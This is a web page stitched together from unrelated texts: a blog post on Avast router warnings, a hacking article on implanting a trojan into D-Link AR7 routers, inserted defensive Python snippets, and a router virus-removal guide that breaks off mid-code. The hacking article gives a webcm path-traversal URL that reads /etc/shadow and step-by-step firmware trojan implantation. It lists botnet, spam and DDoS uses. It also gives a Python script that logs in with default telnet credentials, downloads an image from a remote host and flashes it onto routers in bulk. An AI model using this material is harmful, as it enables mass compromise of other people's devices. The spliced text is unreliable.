
How to check the router for viruses. How to check your router for VPNFilter infection. Protection of network equipment from viruses

Until recently, I did not even know that Avast scares its users with "scary" warnings about their routers. As it turned out, Avast antivirus scans Wi-Fi routers. It reports that the router is not configured correctly, that the device is vulnerable to attacks, or even that the router is infected and attackers have already intercepted DNS addresses and are successfully redirecting you to malicious sites, stealing credit card information, and in general everything is very bad. All these warnings are, of course, seasoned with a dangerous red color and confusing instructions that even a good specialist will not understand without beer. I'm not even talking about ordinary users. This is what the problems found on the D-Link DIR-615 router look like:

The device is vulnerable to attacks:

The solution offered is, of course, updating the router firmware. What else 🙂 Avast can also display a message that your router is protected by a weak password, or that the router is not protected from hacking.

In some cases, you can see a message that your router is infected, and connections are redirected to a malicious server. Avast Antivirus explains this by saying that your router was hacked and its DNS addresses were changed to malicious ones. And it also provides instructions for solving this problem for different routers: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys / Cisco, NETGEAR, Sagem / Sagemco.

In short, all of these recommendations are aimed at checking the DNS addresses and the DNS-related services through which attackers can change the DNS on your router and redirect you to their malicious sites. There are detailed instructions on how to check everything on routers from different manufacturers.

How to respond to a warning from Avast about a router vulnerability?

I think everyone is interested in this question, especially if you have landed on this page. If you are wondering how I would react to such warnings from the antivirus, then the answer is simple: not at all. I am sure that Avast would have found holes in my router through which I could be hacked. I just have Dr.Web. It doesn't do those checks.

Maybe I'm wrong, but no antivirus other than Avast checks the Wi-Fi routers you are connected to for various kinds of vulnerabilities. This feature, called Home Network Security, appeared back in 2015, in the Avast 2015 version.

Avast scans the router for device security issues. However, I don't fully understand how it does it. For example, how does it check the password for entering the router settings? Does it watch the user, or guess the password? If it guessed it, the password is bad 🙂 Well, okay, I'm not a programmer.

Personally, I believe that all these warnings are nothing more than simple recommendations for strengthening the protection of your router. This does not mean that someone has already hacked you and steals your data. What Avast offers:

  • Set a good password and update the router firmware. They say otherwise you can be hacked. Ok, that's understandable. It doesn't have to be signaled as some kind of scary vulnerability. Although again, I don't understand how the antivirus determines that the version of the router software is outdated. It seems to me that this is impossible.
  • The router is not protected from connections from the Internet. Most likely, such a warning appears after checking open ports. But by default, on all routers, the "Access from WAN" function is disabled. I highly doubt that someone will hack into your router over the internet.
  • Well, the worst thing is the substitution of DNS addresses. If any problems with DNS are detected, Avast already directly writes that "Your router is infected!". But in 99% of cases it is not. Again, almost always the router automatically receives DNS from the provider. And all the functions and services through which attackers can somehow change DNS are disabled by default. It seems to me that very often the antivirus "understands" some user settings incorrectly.

Something like this. Of course, you may not agree with me. It seems to me that it is much easier to access a computer directly and infect it than to do it with a router. If we are talking about an attack via the Internet. I would be glad to see your opinion on this matter in the comments.

How to protect the router and remove the warning from Avast?

Let's try to deal with each item that Avast most likely checks and issues warnings.

  • The router is protected by a weak password. There is no encryption. In the first case, the antivirus means the password that you enter to access the router settings. Typically, the default password is admin, or no password is set at all. And it turns out that everyone who is connected to your network can go into the router settings. Therefore, this password must be changed. How to do this, I wrote in the article:. As for the Wi-Fi network password, it must also be strong, and the WPA2 encryption type must be used. I always write about this in the instructions for setting up routers.
  • The router is vulnerable due to old software. This is not entirely true. But, if there is a new firmware for your router model, then it is advisable to update it. Not only to improve security, but also for more stable operation of the device and new features. We have instructions on the website for updating software for routers from different manufacturers. You can find through the search, or ask in the comments. Here's for .
  • The DNS settings have been changed. The router has been hacked. To be honest, I have never seen such cases. As I wrote above, all services through which this can happen are disabled by default. Most often, the router receives DNS from the provider automatically. The only advice I can give is not to manually enter DNS addresses that you are not sure about. And if you specify addresses manually, then it's better to use only Google's DNS, which: . This is also advised in the Avast recommendations, which can be viewed on the official website:. There are detailed instructions for solving DNS problems for almost all routers.

That's all. I hope I was able to at least clarify these warnings in Avast antivirus. Ask questions in the comments, and do not forget to share useful information on this topic. Good luck!

Hello my reader! In this article, I will talk about wonderful ADSL routers,
indispensable pieces of hardware in home and industrial networks. I will tell
you about exploiting these devices for purposes beneficial to us: sewing a
brutal Trojan into the router, in such a way that neither a smart admin nor a
big-eared user notices.

Wishes or requirements for IQ

When I wrote this article, I assumed that to read it, it would be enough to be
an advanced user with GNU/Linux installed who also has some skills in working
and programming in this operating system. However, it seems possible to repeat
my steps on Windows (using Cygwin, for example), but that will not be described.
For maximum enjoyment, you also need soldering iron skills (this is optional).

And it all started...

I digress. So, it all started when one day this very piece of hardware
treacherously dropped the connection to the Internet and did not want to
restore it. At the same time, it was far away and there was no physical access
to it (however, I lied a little: I was just too lazy to get up from the couch
to restart the router :)). The web interface did not respond, but I remembered
that this thing should have telnet or ssh. I had not previously tried to log in
to the administration area and recklessly changed the password to my account
(as it turned out later, in vain, because by default it is "admin: admin"). So I
tried SSH and it worked!

$ ssh [email protected]
$Password:

Like a bolt from the blue! BusyBox! I had never thought about what software
controls this router, and it turns out to be GNU/Linux! I became terribly
curious about how everything works here and, mentally thanking laziness and
chance, I embarked on research.

Collection of information

So where did I start? Of course, from the list of available commands:

#busybox
...
Currently defined functions:
[, ash, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep, hostname, id, ifconfig, init, insmod, kill, ln, login, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
sync, tar, test, tftp, touch, true, tty, umount, wget, whoami, yes

The set is quite sane, enough for normal research and implementation of ideas.
Next, interest arose in the kernel version:

# cat /proc/version
Linux version 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc version 2.95.3
20010315 (release/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006

For reference: MontaVista is a distribution focused on embedded systems. The
vast majority of network equipment manufacturers prefer this system. It can
also be found on other devices, for example in e-books or cell phones.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
processor: 0
cpu model: MIPS 4KEc V4.8
BogoMIPS: 149.91
wait instruction: no
microsecond timers: yes
extra interrupt vector: yes
hardware watchpoint: yes
VCED exceptions: not available
VCEI exceptions: not available

AR7 is a dual-core chip developed by Texas Instruments. It contains a
full-fledged ADSL router on a single chip that supports the ADSL1, ADSL2 and
ADSL2+ standards. It is based on a high-performance MIPS 4KEc RISC processor
with a clock frequency of 175 or 233 (depending on production technology: 18 µm
or 13 µm). The chip has 2 UART interfaces on board, one of which (UART_A) is
used to output debug information, as well as an EJTAG interface that serves for
debugging and for programming (flashing) the Flash memory. The use of these
interfaces is described below.

Finally, I looked at the memory information:

# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
none /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: size erasesize name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

Naturally, not forgetting about block addresses:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

From the above, it followed that Flash memory (/dev/mtdblock) has 5 blocks:

mtd0 - SquashFS file system image. This is a special file system that is
compressed and read-only. The usual compression algorithm is gzip, but in this
case it is LZMA (the compression ratio is higher). The size of this block is
4 MB.

mtd1 - this block contains the MontaVista kernel, compressed with the LZMA
algorithm; the block size is 600 KB.

mtd2 - the ADAM2 bootloader; it boots the kernel and also has a service FTP
server for recovery and flashing. More about it will be said further. The block
size is 64 KB.

mtd3 - a block shared between configuration data and the environment
(environment variables), which can be viewed in /proc/ticfg/env. The
configuration data is in /etc/config.xml. The intermediary between the file
system and the configuration block is the closed-source cm_logic program
(closed like all the cm_* control programs; more about them later). The size of
this block is also 64 KB.

mtd4 - this contains the firmware signature, the kernel and the file system
image. This block is used when updating the firmware via the Web interface. The
image is first stored in this block, then the checksum is checked and, if it
matches, the image is written to its new location.
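
As an added example (not part of the original article), the following Python
cross-checks the two listings above: each /proc/mtd size should equal end minus
start in /proc/ticfg/env, and overlapping address ranges are reported. The
listings are embedded as sample input copied from this page, with the mtd2
range written with a comma; the function names are illustrative.

```python
import re

# Sample input: the /proc/mtd and /proc/ticfg/env listings shown on this page.
PROC_MTD = """\
dev: size erasesize name
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"
"""

TICFG_ENV = """\
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
"""


def parse_proc_mtd(text):
    """Return {name: size_in_bytes} from /proc/mtd output."""
    sizes = {}
    for line in text.splitlines():
        m = re.match(r'^(mtd\d+):\s*([0-9a-fA-F]+)\s+([0-9a-fA-F]+)\s+"', line)
        if m:
            sizes[m.group(1)] = int(m.group(2), 16)
    return sizes


def parse_ticfg_env(text):
    """Return {name: (start, end)} from the mtdN lines of /proc/ticfg/env.

    The separator between the two addresses may be ',' or '.'.
    """
    ranges = {}
    for line in text.splitlines():
        m = re.match(r"^(mtd\d+)\s+0x([0-9a-fA-F]+)[,.]0x([0-9a-fA-F]+)\s*$", line)
        if m:
            ranges[m.group(1)] = (int(m.group(2), 16), int(m.group(3), 16))
    return ranges


def size_mismatches(sizes, ranges):
    """Names whose /proc/mtd size differs from end - start in the environment."""
    return sorted(n for n in sizes
                  if n not in ranges or ranges[n][1] - ranges[n][0] != sizes[n])


def overlaps(ranges):
    """Pairs of partitions whose [start, end) address ranges intersect."""
    names = sorted(ranges)
    found = []
    for i, a in enumerate(names):
        for b in names[i + 1:]:
            (a0, a1), (b0, b1) = ranges[a], ranges[b]
            if a0 < b1 and b0 < a1:
                found.append((a, b))
    return found


def uncovered(ranges, outer):
    """Byte ranges of partition `outer` that no other partition covers."""
    start, end = ranges[outer]
    inner = sorted(r for n, r in ranges.items()
                   if n != outer and r[0] < end and start < r[1])
    gaps, cursor = [], start
    for s, e in inner:
        if s > cursor:
            gaps.append((cursor, s))
        cursor = max(cursor, e)
    if cursor < end:
        gaps.append((cursor, end))
    return gaps


if __name__ == "__main__":
    sizes = parse_proc_mtd(PROC_MTD)
    ranges = parse_ticfg_env(TICFG_ENV)
    print("size mismatches:", size_mismatches(sizes, ranges))
    print("overlapping partitions:", overlaps(ranges))
    print("mtd4 bytes outside other partitions:",
          [(hex(s), hex(e)) for s, e in uncovered(ranges, "mtd4")])
```

On this layout the sizes agree, and mtd4 overlaps mtd0 and mtd1, so an integrity baseline of the device should hash mtd0 and mtd1 and expect any write to mtd4 to change both. The 0x90 bytes at the start of mtd4 are covered by no other partition.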

RAM (16 MB in this model, but ADAM2 in this model sees only 14 MB; this is
fixed by an update) is mounted at the /var directory and can be safely used for
our purposes:

# free
total used free shared buffers
Mem: 14276 10452 3824 0

Let's not forget to go over the list of processes. Of the interesting daemons
lurking here: thttpd - Web server; dproxy - caching DNS proxy server; ddnsd -
DNS daemon; pppd... - the daemon that implements the PPP connection, and in its
parameters we see the account information. So, if the router is not pretending
to be a hose (read: not in bridge mode), then the account can easily be
obtained.

The cm_* programs are proprietary and are included in the source package
already compiled (these programs are also developed by Texas Instruments, so
there is no need to scold D-Link for non-compliance with licenses).

cm_logic - a program that controls the logic of the system; the configuration
passes through it. It synchronizes /etc/config.xml with the corresponding part
of the contents of /dev/ticfg (pointing to mtd3).

cm_cli - command line interface for managing and configuring the system. For
example, connection settings are made through this interface.

cm_pc - launches and monitors processes and links them with rules (for example,
run the program as a daemon; the rules also include information about ports to
open) as described in /etc/progdefs.xml; it is loaded immediately after the
kernel.

webcm - the CGI interface. It is full of holes; for example, it allows you to
look at /etc/shadow simply by accessing a URL.

http://192.168.1.1/../../../etc/shadow

Got nothing, thttpd is not so simple, but if so:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Another thing. This can be used to collect information if there is no access to
ssh/telnet, but there is access to the Web interface.

firmwarecfg - used for flashing via the Web interface. The image is passed to
this program by a POST request from the Web interface, and it writes the image
to Flash memory after checking the image checksum.
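
The two webcm/thttpd requests shown above leave a recognizable trace in web
server or proxy logs. The following detection sketch is an added example, not
code from the original article. It assumes Common Log Format lines and assumes
that legitimate webcm pages are requested with a getpage value under "../html/";
the log lines are constructed sample data.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: pages of the legitimate web UI are requested under this prefix.
ALLOWED_PREFIX = "../html/"

# Common Log Format: client, ident, user, [time], "METHOD target PROTO", ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

# Constructed sample log (addresses and timestamps are made up).
SAMPLE_LOG = """\
192.168.1.2 - - [01/Jan/2007:10:00:00 +0000] "GET /cgi-bin/webcm?getpage=../html/index.html HTTP/1.1" 200 5120
192.168.1.7 - - [01/Jan/2007:10:00:05 +0000] "GET /../../../etc/shadow HTTP/1.1" 404 0
192.168.1.7 - - [01/Jan/2007:10:00:09 +0000] "GET /cgi-bin/webcm?getpage=/etc/shadow HTTP/1.1" 200 96
192.168.1.7 - - [01/Jan/2007:10:00:12 +0000] "GET /cgi-bin/webcm?getpage=%2Fetc%2Fshadow HTTP/1.1" 200 96
192.168.1.2 - - [01/Jan/2007:10:01:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 900
"""


def classify_target(target):
    """Return a reason string if the request looks like a file read outside
    the web UI, otherwise None."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Case 1: ".." segments in the URL path itself.
    if ".." in path.split("/"):
        return "path traversal in URL path"
    # Case 2: webcm asked to render a file through its getpage parameter.
    if path.endswith("/cgi-bin/webcm"):
        # parse_qs percent-decodes the values, so encoded forms are covered.
        for page in parse_qs(parts.query).get("getpage", []):
            if page.startswith("/"):
                return "webcm getpage with absolute path: " + page
            if not page.startswith(ALLOWED_PREFIX):
                return "webcm getpage outside " + ALLOWED_PREFIX + ": " + page
            # Resolve any ../ segments that follow the allowed prefix.
            rest = posixpath.normpath(page[len(ALLOWED_PREFIX):])
            if rest == ".." or rest.startswith("../") or rest.startswith("/"):
                return "webcm getpage escapes " + ALLOWED_PREFIX + ": " + page
    return None


def scan_log(text):
    """Return (client_ip, request_target, reason) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = classify_target(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("target"), reason))
    return hits


if __name__ == "__main__":
    for ip, target, reason in scan_log(SAMPLE_LOG):
        print(ip, target, "->", reason)
```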

This completes the collection of primary information, it's time to move on to decisive
actions.

Installing Development Tools and Compiling Firmware

Firmware for D-Link routers (and all others based on GNU/Linux) is distributed
under the GPL license; you can get the sources on the official FTP server. In
fact, you can choose any firmware from the list offered, they are the same (for
the T-series). The package contains the source code of the kernel and
environment, the necessary tools, and a toolchain for developing/compiling
programs. Unpack it to the root and add the path to the toolchain's bin
directory to the PATH environment variable:

$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/

Now, to compile your own firmware, go to the directory with the source code and
run make.

$ cd DSL/TYLinuxV3/src && make

Many questions will be asked about enabling device support (it is better to
answer them in the affirmative). At the end of compilation, firmware images
will be created in the TYLinuxV3/images directory. You can also run the script
named after your model from the /TYLinuxV3/src/scripts directory.

A few words about transferring files between a router and a computer. The very
first method I used was transferring files over the SSH protocol, using the scp
program. But a little later I found out that mc (Midnight Commander) can also
connect via SSH (Panel -> Shell connection). Alternatively, you can set up a Web
or FTP server on your workstation. Later I gave preference to the Web server,
because it works fastest. I installed thttpd, small and fast, just like on the
router. We start it on our machine and pull the file onto the router, after
changing to the /var directory (which, as mentioned earlier, is writable).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# cd /var
# wget http://192.168.1.2:8080/file

To download a file from the router, you can also raise the Web server:

# thttpd -g -d /var -u root -p 8080

Note that if you want to download an executable file from the router, you
should remove its execute permission. When downloading a large number of files
from the router, it is better to use mc: you won't need to copy the files to
/var first and remove the permissions, and then delete these files to free up
space. In general, it is a matter of taste; choose any option that is
convenient for you.

Creating your own program

Let's start, of course, with the classic of programming - HelloWorld. There are
no special rules. The text of the program is painfully familiar:

#include <stdio.h>

/* Prints a fixed string; used only to test the cross-toolchain. */
int main(void)
{
    printf("Mate.Feed.Kill.Repeat.");
    return 0;
}

We compile (the path to the toolchain must be specified in the PATH environment
variable):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# cd /var
# chmod +x hell
# ./hell

And ... nothing will happen, or a path-not-found message will appear. What is
the matter? I already talked about cm_pc earlier: this program launches others
according to the rules described in /etc/progdefs.xml. Now comes the time to
modify and flash file system images.

File system modification

In order to modify the file system, you first need to unpack it. As I
mentioned, the file system here is SquashFS with an LZMA patch. The firmware
development package includes only the mksquashfs program (for creating an
image); unsquashfs (for unpacking) is missing. But it doesn't matter, everything
is available on the file system's website; we need the first version. After
applying the LZMA patch and building the utilities, we put them in a convenient
place. First, let's get the file system image from the router:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Now you can modify as you like, but we want to throw FuckTheWorld into
directory /bin and add a rule to run in /etc/progdefs.xml.

$ cp hello unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

And add this (between the tags ):

hell
/bin/hell

Save and pack back:

$ mksquashfs unpacked_fs my_fs.img -noappend

Note that the file system image must not exceed the allowable size. If you feel
like trying something urgently and it doesn't fit, remove something
"unnecessary" from the image, like grep or whoami, or use the UPX executable
packer. Now upload the image to the router and move on to the next section.

Writing a File System Image

The way to flash the router is very simple: it consists of writing to the
/dev/mtdblock/* device. So, upload the file system image to the router in any
convenient way and perform this simple action:

# cat my_fs.img > /dev/mtdblock/0 && reboot

# cp my_fs.img /dev/mtdblock/0 && reboot

After a while, when the recording process is over, the router will reboot, and
the changes will take effect. Let's try to run our example:

#hell
Mate.Feed.Kill.Repeat.

Ways to recover in case of failure

Before flashing the router with more serious "crafts", you should learn how to
act in critical cases when the router refuses to boot. There are no hopeless
situations. The ADAM2 FTP server comes to the rescue. First you need to point
an FTP client at the ADAM2 IP address, which can be found in /proc/ticfg/env
(parameter my_ipaddress).

$ ftp 192.168.1.199
220 ADAM2 FTP Server ready.
530 Please login with USER and PASS.

For clarity, you can turn on the debug mode, then all
information and all FTP responses:

Login / password - adam2 / adam2. The flashing process is very simple. To start
change the FTP session to binary mode:

ftp> quote MEDIA FLSH

Now we send, for example, an image of the file system and specify the location
destination:

ftp> put fs.img "fs.img mtd0"

We are waiting for the end of the recording, reboot the router, exit the session:

ftp> quote REBOOT
ftp>quit

That's all! As you can see, there is nothing difficult; now if something goes
wrong, you can always put things right.

For convenience, you should give it a normal IP address, enable autoload (so as
not to dance with reset) and slightly increase the time it waits for a
connection before loading the kernel. All these settings are stored in
environment variables; there are special ADAM2 FTP commands, GETENV and SETENV
(for getting and setting a variable, respectively). In the FTP session, enter
the following commands:

ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> quote REBOOT
ftp>quit

The router reboots and you can reach ADAM2 at 192.168.1.1:21. If you want to
reflash the kernel image and the kernel then refuses to boot, FTP will start by
itself. Before flashing modified images, be sure to save the current ones for
recovery. In general, you can also change environment variables via
/proc/ticfg/env; I just wanted to talk more about working with FTP.

# echo my_ipaddress 192.168.1.1 > /proc/ticfg/env

And you can check the changes like this:

# cat /proc/ticfg/env | grep my_ipaddress

What should you do if you want to try flashing the bootloader, and how should
you act in case of failure? Or if the router for some reason does not start and
there is no access to ADAM2? There is a way out: JTAG, or rather EJTAG (the
extended version), is present in this chip. This is an interface for in-circuit
debugging/programming.

To connect to this interface, we need the computer's LPT port, connectors and
4 resistors. The circuit is simple.

I hasten to note that flashing via JTAG is not fast; it takes quite a lot of
time. So it should only be used to restore the bootloader when it doesn't work.
To communicate via JTAG, you should use a special program such as UrJTAG. Below
is an example of working with this interface.
Communication setup:

jtag> cable parallel 0x378 DLC5
jtag> detect

Flash Memory Detection:

jtag> detectflash 0x30000000 1

Reading Flash Memory:

jtag> readmem 0x30000000 0x400000 fullflash.img

Writing to memory (bootloader):

jtag> flashmem 0x30000000 adam2.img

It is also useful to know about the UART interface (I promised to talk about it
earlier). UART_A is where the bootloader (at an early stage of booting you can
talk to it) and the kernel report, that is, write their logs. When writing
modified kernels, this is indispensable for debugging. UART - Universal
Asynchronous Receiver/Transmitter - is almost always present on
microcontrollers.

The adapter circuit is very simple. It is based on a single chip, a TTL level
converter: MAX232 for COM and FT232R for USB. These chips are quite common and
there will be no problems buying them.

The circuit is assembled on a breadboard (which can be safely placed in the COM
port connector housing) in 20 minutes and brings a lot of benefit. For example,
when debugging kernels it is an absolutely indispensable solution. And if
electronics is not your thing? The way out is USB cables for old phones; they
have a UART-to-USB converter built in.

Some distribution ideas

Your proxy/socks on someone else's router is great. As, in fact, spamming
over all protocols router. This is not a Windows computer for you.
rearrange every month :). Routers often do not change or reflash. Yes and
who, besides us, would come up with the very idea of ​​​​infecting a router?

Don't forget, we control all traffic from the user/network. For more
powerful routers and it is already possible to hang a DDOS bot. Hide file/hide process,
intercept writing to mtd blocks, eliminating the erasure of our program - everything that
whatever!

Let's say you are going to start writing a serious program for a router.
Very good debugging is important, you will probably have to do it a lot of times
rewrite/restore images... This is a very sad prospect. Even hands
slightly lower, if we also take into account that the rewriting resource of Flash memory
small (more details in the documentation for the memory chip), and there is a prospect
ditch her. But there is a way out! Qemu can emulate AR7! Can you imagine what
does it provide opportunities and limitless convenience? Now there's nothing to stop us
write something incredibly cool!

So. You wrote a program, checked it on your own or 1-2 other people's routers, but
the whole network is still ahead, manually infecting is a chore, on the 10th router you are already starting
curse the whole world, and floats in the eyes from the strings of "cat" and "mtd". Let's write
program to automate these routine actions. I chose the python language.

The work plan is:

  • compiling a list of routers, for example, using nmap;
  • the script should take IP addresses from the list in order, enter through
    telnet with standard login/password;
  • then the same actions: upload the modified image,
    overwrite, reboot.

#!/usr/bin/env python
#Encode=UTF-8

import telnetlib,time

SERVER="http://anyhost.com/fs.image"

for addr in open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep(5)
telnet.write("admin\n")
telnet.read_until("Password:")
telnet.write("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write("reboot")
telnet.close()

The logic of the script is very far from ideal, now I will explain why. For
first you should check the firmware / kernel version and the router model, because there may be
major differences in performance. Further, instead of firmware blanks, you should download
file system image from the router, unpack, modify and send
back. This will eliminate compatibility issues with different
models / firmware versions, because the stability of work is the most important thing for you.
Also, a virus can have the functions of a worm, and if you wish, you can always
attach a network scanner to it, brute force for RDP and similar chips.

There is another great distribution method. Nothing stops you from writing
program for Windows, which will have with you (or download from your
server) image of the file system and infect the router with it, if it is present.
Distribute this program in all "standard" ways: removable drives,
exploits for programs, infection of other programs... Combining these methods,
could be a major pandemic. Just imagine this picture
such devices are ubiquitous.

Router protection

After digging through all this, I thought: how can I protect the router?
Otherwise, you see, I'll get caught myself. The first step is to change the user
password to a more complex and longer one (the limit is 8 characters) and to
change the banners and service greetings (with a hex editor or, preferably, by
recompiling the programs) so that nmap or other scanners cannot determine the
versions of the services.

You should also change the ports on which the daemons listen. This is done by
modifying progdefs.xml. Kill telnet (its password is the easiest to guess, and
the protocol is insecure, so why do we need it), turn on the firewall, and allow
connections to services only from your own IP or MAC address. Also use the
firewall to protect the network or computer; it is there for a reason. A
competent set of rules will always help to protect you.

Conclusion

Many routers and similar devices, not only D-Link's, are built on the AR7 chip;
the list includes Acorp, NetGear, Linksys, Actionec... This AR7 is quite
popular, along with MontaVista. It follows that, using the same toolchain, you
can carry out the steps described in the article without any problems.

Think about it: in addition to harmful actions, you can also do something
useful/pleasant for yourself and others (I do not argue, the pleasure of hacking
cannot be replaced, but still). You can make your own firmware, for example for
more powerful routers capable of downloading/distributing torrents... All
models have a USB 1.1 interface, but in the lower-end models it is not soldered
on. Add a USB module and a file system driver to the kernel, equip the router
with Flash memory, and as a result you get a kind of network storage for little
money. There are a lot of options, and ideas should arise in the thousands: do
not limit yourself, create and create!

In light of the increasing cases of DNS spoofing by malware on the devices of Internet users, the question of the security of Wi-Fi routers arises. How to check the router for viruses? How to remove a virus in a router? The question is complex and simple at the same time. There is a solution!


The virus itself cannot write itself to most modern routers due to the small space in the memory of the router itself, but it can zombify the router to participate in a botnet. As a rule, this is a botnet to attack various servers, or to redirect and analyze the flow of information leaving you on the Internet.

Your passwords and personal correspondence can fall into the hands of intruders!

This needs to be corrected as soon as possible.

  • Reset router settings
  • Router firmware
  • Reconfiguration

Reset router settings

You can reset the router settings by pressing the reset button. Usually this button is located on the back of the router, where the LAN ports are. The button is usually recessed into a hole to avoid accidental pressing, so you have to use a toothpick. The reset will delete the router settings changed by the virus and install the factory ones in their place. I must warn you that if you do not know how to configure a router, then resetting its settings is not worth it!

Router firmware

Sometimes the virus "floods" modified firmware to the router. You can remove virus firmware from the router by flashing the router again.

Connect the computer to the router with a LAN cable. LAN cable is included with any router. Or via Wi-Fi, if there is no possibility of a cable connection. It's better to connect with a cable! The wireless connection is considered unstable and is not suitable for router firmware.

After we have connected to the router, open the browser (Chrome, Opera, Mozilla, IE) and enter the address of the ASUS router in the address bar, for Asus it is 192.168. Login: admin, Password: admin. If the username and password do not fit, then ask the person who set up your router, maybe he changed them.

Download the firmware from the manufacturer's website and select the firmware on the disk using the router settings page. For the vast majority of routers, the firmware steps are the same.

Problems when distributing Wi-Fi using a router arise for various reasons. One of them is the infection of the distributing device with a virus, which you can get rid of on your own.

  • a virus that slows down the speed of the Internet in various ways. For example, such malicious software knocks down the firmware settings or starts downloading some advertising virus content to the computer;
  • a virus that replaces website addresses. It looks like this: a user visits any known safe site, and the virus changes the DNS in such a way that the user gets to an advertising site or sees advertising banners where the site owners did not place them. Such a virus is also dangerous because it can transfer you to a site containing other viruses.

In any case, if you notice the incorrect operation of the router, you should check it for viruses, especially since it is very easy to get rid of them.

How does a virus get into a router

The router provides Internet to all devices connected to it. This means that all devices and the router itself are on the same home network. This is what the virus uses: it enters the computer from some site or downloaded file, and then it is transmitted over the network to the router, where it starts to play dirty tricks. The process depends on the type of virus: for example, some malware deliberately does not reveal itself on the computer and begins to act only when it gets into the router, while other malware manages to harm both the operating system and the router firmware at the same time.

Checking the router

Before cleaning the router of viruses, you need to check whether any are on it. To find out, first use the Internet directly from a computer, bypassing the router. That is, unplug the WAN (Internet) cable or modem from the router and plug it into the computer's port, and then follow these steps:

If you are experiencing speed issues, then follow these three steps.

  1. Check your internet speed. You need this figure so that you can later compare the speed of the direct connection with the speed through the router. For example, you can download a file or use the online service Speedtest.

    We scan the speed of the Internet through the site Speedtest

  2. To determine the quality of the connection more accurately, you need to know the ping. Ping is the time it takes for a signal to be sent from your device, reach the server, and return. Naturally, the larger it is, the worse it is for you. Open a command prompt, type the ping command followed by the IP address, and run it. The IP address is that of your connection; the default is usually 192.168.0.1, but it may vary. Remember the result. A ping of up to 40 ms is excellent, 40-110 ms is a normal average value, and with more than 110 ms you should think about reconfiguring the network, improving the signal or changing the provider.

    Execute the ping ip command

  3. After the list of sent packets, you will see statistics. You are interested in the “Packets” line, which counts how many packets were sent, received and lost. If the number of lost packets exceeds 5%, you need to find out what the problem is. If a large number of packets do not reach the server or do not return, this will greatly affect the speed of the Internet.

    See what percentage of packets are lost

After you complete all the above steps and have detailed information about ping, the number of lost packets and Internet speed, reconnect the WAN (Internet) cable or modem to the router and check the same indicators when connected via Wi-Fi. If the parameters are at approximately the same level, then the problem is not in the router; perhaps the cause is on the operator's side. Otherwise, if problems with the Internet occur only when using it through the router, you need to perform a factory reset and virus cleaning.
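The comparison described above can be scripted. The following Python is an added example, not part of the original article: it parses the statistics block printed by ping and applies the article's thresholds (5% loss, 40 ms, 110 ms) to a direct and a through-the-router measurement. The function names, the verdict strings and the sample output are constructed for illustration, and "approximately the same level" is simplified to "both measurements fall in an acceptable band".

```python
import re

def parse_ping(output):
    """Return (loss percent, average ms or None) from ping summary text.

    Reads the Windows form ("(0% loss)", "Average = 31ms") and the
    Linux/macOS form ("0% packet loss", "min/avg/max/mdev = a/b/c/d ms").
    """
    loss = re.search(r"(\d+(?:\.\d+)?)% (?:packet )?loss", output)
    if loss is None:
        raise ValueError("no ping statistics found")
    avg = (re.search(r"Average = (\d+)\s*ms", output)
           or re.search(r"= [\d.]+/([\d.]+)/", output))
    # With 100% loss ping prints no round-trip line, so avg may be absent.
    return float(loss.group(1)), float(avg.group(1)) if avg else None

def rate(loss_pct, avg_ms):
    """Apply the thresholds from the text: 5% loss, 40 ms and 110 ms."""
    if avg_ms is None or loss_pct > 5:
        return "lossy"
    if avg_ms <= 40:
        return "excellent"
    return "normal" if avg_ms <= 110 else "slow"

def compare(direct_output, router_output):
    """Say where to look next, given ping text from both connections."""
    direct = rate(*parse_ping(direct_output))
    via_router = rate(*parse_ping(router_output))
    if direct in ("lossy", "slow"):
        return "provider or line"   # bad even without the router
    if via_router in ("lossy", "slow"):
        return "router"             # degraded only through the router
    return "no problem found"

# Constructed sample output; 203.0.113.10 is a documentation address.
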